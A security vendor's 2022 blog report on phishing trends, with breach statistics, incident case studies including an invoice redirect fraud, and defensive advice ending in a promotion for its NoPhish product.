Thursday, October 13th, 2022
State of Phishing 2022
Over the last twelve months, research has found that phishing remains the most common technique for gaining unauthorised access to an IT system. The popularity of phishing lies in its simple attack vector that exploits the weaknesses of human operators. It’s a flexible, low-cost, low-risk method of launching an attack. For example, an email sent to thousands of users only needs one recipient to click on one link. But phishing 2022 has evolved past simple techniques of sending mass emails to large amounts of users into attacks that are more sophisticated, targeted and increasingly difficult to spot.
In their cyber security breaches survey, the UK Government’s official statistics for 2022 showed that 39% of UK businesses reported at least one cyber-attack in the previous year and that 83% of these were phishing attacks.
Worryingly, 31% of the businesses reporting attacks estimate these occurred at least once a week. Furthermore, one in five of these businesses experienced adverse outcomes, such as business disruption or direct financial loss.
Email remains the most prevalent method of initiating a phishing attack. Figures from 2021 show that attackers used email in 96% of recorded incidents. Malicious websites accounted for 3% of incidents, and other forms of messaging, including text messages, accounted for the remainder.
From IBM’s report, “Cost of a Data Breach“, issued in July 2022, reported the following updated metrics:
- USD $4.91 million average total cost of a phishing attack in 2022
- USD $4.35 million average total cost of a data breach in 2022
- 83% of organisations have had more than one breach
- 19% of breaches caused by stolen or compromised credentials
- 59% of organisations don’t deploy zero trust
Recent research conducted by security researchers into the impact of phishing attacks found that:
- 60% of affected businesses lost important information
- 52% of affected businesses had access credentials compromised
- 47% of affected businesses suffered a ransomware infection
- 29% of affected businesses suffered a malware infection
- 18% of affected businesses suffered financial loss
Attackers use phishing messages to launch attacks, directly delivering malware through attachments or linking to an external resource that convinces the user to provide a copy of their access credentials. With increasing user awareness of the risks of email attachments, phishing has evolved so that in 2022 only 24% of phishing emails contained an attachment. Of these, HTML attachments were the most common method of initiating an attack. This has taken over from PDF attachments being the most common malicious file attachment in 2021.
Most Prominent Attacks of 2021-2022
The Russian invasion of Ukraine saw a massive campaign of phishing attacks on Ukrainian public authorities and critical infrastructure. The attacks sought to gain access to systems and networks and install and spread malware. Following the invasion, the Ukraine State Service of Special Communication and Information Protection (SSSCIP) detected further phishing campaigns targeting Ukrainian military personnel from Russian and Belarussian state actors.
The University of California San Diego (UCSD) Health suffered a data breach in 2021 that exposed patients, employees, and students’ sensitive personal information. The attack started in December 2020 with a phishing email. The attacker then compromised several additional email accounts during the period up until April 2021 using subsequent phishing attacks. Then, in March 2021, system administrators spotted suspicious activity and, in April 2021, detected unauthorised access to one of the affected email accounts. UCSD Health notified the affected parties and provided advice.
Utah based healthcare provider Revere Health suffered a data breach in June 2021 that exposed the sensitive personal information of around 12,000 cardiology patients. The attack started with a phishing email that purported to be from the US Agency for International Development (USAID) and stole the access credentials of a user when they clicked on a link in the email. The attacker then used these credentials to access the user’s email account and access patients’ personal information contained in stored emails.
Revere Health’s IT security team detected the unauthorised activity and halted the attack in under an hour by severing the connection to the systems. However, this was still long enough for the attacker to exfiltrate the contents of the compromised email account. Security researchers believe that the attack was looking to gather more access credentials and move laterally across systems to initiate financial gain rather than steal patient information.
Insights for Phishing 2022
New Attack Vectors
Over the last year, a sophisticated phishing campaign that could bypass automated phishing detection has targeted office 365 users—mimicking legitimate services and directing users to a simulated SharePoint page. Users were then required to enter access credentials to access what appeared to be a legitimate file share request. The phishing emails were detectable by the presence of URLs with malformed HTTP headers. The primary phishing URL pointed to an Appspot cloud platform in a Google storage resource that collected the user’s access credentials and then connected to a Google User Content domain with an Office 365 phishing page.
April 2022 saw a new phishing technique emerge using browser-in-the-browser fake pop-up windows that emulate single sign on windows used by websites such as Facebook and Google. The fake pop-ups are visually identical to their authentic counterparts and come with a valid SSL certificate to provide false assurance that the window is legitimate. The implementation of the pop up can also include showing the user a legitimate web address when the mouse hovers over a URL, only using the malicious URL once the user clicks the link.
Research suggests that advances in deepfake technology may mean that this can be employed in phishing attacks to provide compelling audio or video messaging to simulate a living person known to the message recipient. If this becomes a practical reality, such messaging could deliver persuasive content as part of a sophisticated spear phishing attack.
Phishing has accounted for 16% of breaches so far this year, making it the 2nd most common initial attack vendor used as well as the costliest – costing an average of $4.91 million. 83% of organisations have had more than one breach this year, with 60% having to increase the price of their products or services as a result of the breach.
Increasing user awareness and suspicion of email is reducing the click through rates. Consequently, attackers are increasingly looking at other messaging routes, including text messages and services such as WhatsApp, to launch phishing attacks. Users are more likely to see these different notifications as more trusted due to unfamiliarity with their security weaknesses. The widespread availability of mobile numbers obtained from unauthorised data breaches or legitimate marketing organisations makes this phishing practical. Online retailers’ general use of text messages for order confirmations and delivery updates makes it easier to launch credible phishing attacks.
Attackers are looking to move away from better protected large organisations to target smaller companies with less capable defences. In addition, the prevalence of integrated supply chains through network connectivity between suppliers means that compromising a small business at the bottom of the supply chain offers a route for lateral movement up the supply chain to the larger and more lucrative targets.
Spear phishing is now more commonplace thanks to the widely available information on professional networking and career development websites. Initially targeting larger organisations, almost any size business can now be subject to targeted phishing with credible and compelling messages that improve the attackers’ chances of success.
Attackers also use business impersonation to improve their click through rates by combining targeted phishing with emails that impersonate senders known to the recipient. These can appear as internal communications or messages from contacts, suppliers, or other individuals or companies with which the recipient may know or have a business relationship. In addition, they may use more general business impersonation techniques, impersonating communications from official bodies such as tax authorities or commonly used businesses such as Microsoft and Amazon. Here, success relies on the likelihood that the recipient has previously interacted with the impersonated company.
Phishing-as-a-Service (PhaaS): A Growing Trend
These days with services like PhaaS, cybercrime has become accessible to everyone. They just need to know where to look and be willing to pay for it. PhaaS is a black-market industry where experienced cybercriminals sell their knowledge as well access to their tools. This enables others to successfully carry out a phishing attack.
Cybercriminals advertise their ‘phishing kits’ on the dark web which include everything needed to carry out a phishing attack. These kits often include curated databases of targets and branded email templates. Some cybercriminals also offer access to collated open-source intelligence (OSINT) which allow users to create highly convincing attacks, or the back-end code to create fraudulent webpages that mimic well-known brands to harvest credentials.
We have seen PhaaS grow in popularity in previous months as it is a very low risk option for the experienced hacker. They can put all their skills to use, make money and have a very low risk of getting caught.
Phishing as a service has made phishing more profitable as cybercriminals no longer need to spend time building their own email templates or false websites to scrape credentials or payment information. All they need to do is download a kit from a PhaaS vendor and follow the instructions to launch their attack. The time between ideation of attack and ‘fulfilment’ is minimal.
Invoice Redirect Fraud:
Lucrative for the Criminals, Devastating for Businesses
Invoice redirect fraud is where fraudsters pretend to be a supplier or service provider to trick employees into changing bank account payee details. This type of attack is typically well engineered by cyber criminals. It can have devastating effects on legitimate businesses, especially small companies that deal with large suppliers.
An invoice fraud case study
The victim organisation (small manufacturing firm in Ireland) hired a new CFO who had published their new job on LinkedIn. This was great information for the adversaries to use in crafting a social engineering attack, targeting the new CFO. The cyber criminals (logging in from Lithuania) then launched a sophisticated spear phishing attack to steal the CFO’s credentials.
After gaining access to their inbox, they waited and read relevant correspondence related to a regular transaction between the company and a large supplier whereby the victim company was paying €500,000 a month to their supplier. The new invoice was in, and the CFO had to approve it. The payment was not due until the end of the month, so they didn’t act on it straight away. The attack started in the meantime. The attackers registered a new domain, incredibly like the victim organisation’s domain. They forwarded a few emails to the fraudulent mailbox where they infiltrated the correspondence and impersonated the supplier.
They then sent an email following on from the original email trail with a new invoice attached. It advised that they were having issues with their bank account and provided new account details to pay. The victim organisation then submitted a payment for the amount requested to pay an account held with another bank. The organisation was made aware of the fraud when they were contacted by their real supplier who stated that they had not received the funds. The supplier confirmed that the bank details on the second invoice were not theirs.
The victim organisations IT team investigated to see where the email interception happened. However, the money transferred had already been moved on by the fraudsters by the time the alarm was raised.
Why was this attack successful?
- The victim organisation did not provide user awareness training to the new CFO in a timely manner
- They did not have MFA turned on
- No monitoring in place to detect real-time attacks (especially geo-location-based logins)
• 2022 has seen cryptocurrencies and non-fungible tokens become a popular target for attackers. It is driven by their rapid increase in interest among the public and limited awareness of the risks.
• The retail sector remains the most popular target for phishing emails, followed by manufacturing, food and beverage, and technology.
• Businesses in the North American region remain the most common target for phishing 2022. This is closely followed by Western Europe and Australasia
How to Protect Yourself from Phishing 2022
There are several risk prevention measures that can help mitigate phishing. These include:
– Multi-factor authentication
Multi-factor authentication is where the user is granted access to a website or application. It is only after successfully presenting two or more pieces of evidence to an authentication mechanism. By implementing MFA, it provides an additional layer of security to help reduce the likelihood of a successful spearing attack. Make sure you turn on MFA on all your online accounts – personal and professional ones!
– Educational campaigns
At the organisational level, enterprises can raise awareness and actively train employees. They should highlight spear phishing attacks as a high-risk threat. Training materials can feature real-life examples of spear phishing, with questions designed to test employee knowledge. Employees who are aware of spear phishing are less likely to fall victim to an attack.
– Password policy
A well-defined password management policy should take steps to prevent employees from using corporate passwords on fake external websites. This policy should outline the criteria needed to create a complex password, how often passwords should be changed, and how passwords should never be shared. It should also outline that passwords should never be input should you suspect the site to be suspicious as inputting such details may compromise all your systems and applications.
– Be careful what information you share online
Successfully crafted spear-phishing attacks use the information you share online against you. Your job description, your contact details, your detailed routine, even your images or your voice. It is important to limit the type of information you share online. This is so attackers cannot use it to craft good spear-phishing content.
– Implement Phishing Defence Capabilities
Even with the best security procedures in place, phishing emails will end up in your users email boxes. Organisations need a fast and easy way of reporting and investigating these suspicious emails.
NoPhish by Smarttech247 identifies and investigates even the most complex phishing attempts. It then removes the threat from your organisation in real-time. Your users can report a suspicious email with just one click, keeping the whole organisation safe. NoPhish is a simple Office 365 app integration that can be deployed in minutes. NoPhish also hunts for the same reported email in other users’ inbox to ensure that the whole organisation is safe.
Simply put, the best defence is the multi-layered approach that offers a customised phishing solution.
Technical controls can weed out the obvious and highlight the possibly suspicious. In addition, training in phishing recognition and critical thinking techniques followed by refresher training and test campaigns can reinforce awareness..
Phishing 2022 remains the primary method of launching a cyber-attack, and while awareness is increasing, businesses cannot be complacent as attacks continue to evolve to bypass standard controls. User tricks such as checking the sender’s email address or hovering the mouse over a link to check the validity of the underlying URL will not always be effective as attacks become more sophisticated.
Successful phishing 2022 protection requires a layered approach to maximise detection. Defences start with email and DNS filtering techniques to block known threats, supported by next-generation anti-malware software. Next, detecting novel threats and countering advanced persistent threats requires more comprehensive detection techniques supported by threat intelligence. Finally, employee security awareness training and exercises will reduce the likelihood of users falling for a phishing message that bypasses the technical controls and reaches their inbox.